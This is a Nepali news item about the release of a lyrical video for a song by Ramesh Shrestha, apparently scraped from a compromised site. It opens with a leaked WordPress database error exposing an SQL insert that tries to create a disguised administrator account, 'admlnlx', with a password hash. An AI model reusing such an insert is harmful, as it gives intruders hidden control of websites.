WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bvh4ffxS6rPu1ZcfNRupk/vU8DXOSZ0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-12 23:00:18', '', 'admlnlx', 'admlnlx')
काठमाण्डौं । रमेश श्रेष्ठको “वरको छायाँले” बोलको गीतको लिरिकल भिडियो आज सार्वजनिक भएको छ ।
आज काठमाण्डौमा एक कार्यक्रमबीच उक्त लिरिकल भिडियो सार्वजनिक गरिएको हो ।
ओखलढुंगा निवासी श्रेष्ठले आफ्नै जन्मभूमि रुम्जाटार आसपासलाई समेटेर लेखेका गीतमा जसिहाङ राईले संगीत गरेका छन् भने राजु कार्कीको संगीत संयोजन रहेको छ । उक्त गीतमा संगीतकार जसिहाङ राई र चर्चित गायिका श्रेया राईको स्वर रहेको छ ।
गीतको लिरिकल भिडियो सम्पादन गङ्गाराम राईको रहेको छ । उक्त भिडियो गाउँले ईन्टरनेटमेन्ट युटुबबाट सार्वजनिक गरिएको छ ।
कार्यक्रममा जिमी राई उत्थान समाज सोलुका केन्द्रीय अध्यक्ष यस बहादुर राई, चोमोलुङमा प्रतिष्ठानका सचिव सुबास जमरकटेल, रहस्य साप्ताहिकका सम्पादक मुक्ति बास्तोला, गायक राईबहादुर राईलगायत गीत संगीतसँग आवद्ध श्रष्टा र सञ्चारकर्मीको बाक्लो उपस्थिति रहेको थियो ।